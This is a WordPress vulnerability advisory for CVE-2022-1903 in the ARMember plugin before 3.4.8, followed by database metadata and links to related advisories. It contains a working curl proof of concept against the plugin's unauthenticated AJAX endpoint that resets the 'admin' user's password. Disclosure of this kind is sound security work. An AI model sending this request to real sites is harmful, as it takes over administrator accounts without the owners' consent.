ARMember < 3.4.8 – Unauthenticated Admin Account Takeover | CVE 2022-1903 | Plugin Vulnerabilities

Description

The plugin is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' \
    --data 'action=arm_shortcode_form_ajax_action&user_pass=newpassword&repeat_pass=newpassword&arm_action=change-password&key2=x&action2=rp&login2=admin'

Notes:
+ The `login2` parameter corresponds to the username to change the password for (in our case it's the "admin" user)
+ The `user_pass` and `repeat_pass` correspond to the new password to be set (both fields must be set to the same password)

Affects Plugins

armember-membership

Fixed in 3.4.8

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

28d26aa6-a8db-4c20-9ec7-39821c606a08

Timeline

Publicly Published

2022-06-06 (about 1 years ago)

Added

2022-06-06 (about 1 years ago)

Last Updated

2023-03-09 (about 1 years ago)

Other

Published

Title

Published

2024-04-05

Title

Email Subscribers & Newsletters < 5.7.14 - Missing Authorization

Published

2023-10-17

Title

Themify Ultra < 7.3.6 - Missing Authorization

Published

2024-02-07

Title

ImageRecycle pdf & image compression < 3.1.14 - Missing Authorization to Settings Update in optimizeAllOn

Published

2021-12-08

Title

WP Google Map < 1.8.1 - Subscriber+ Map Creation/Update/Deletion

Published

2023-11-23

Title

Porto Theme - Functionality < 2.12.1 - Missing Authorization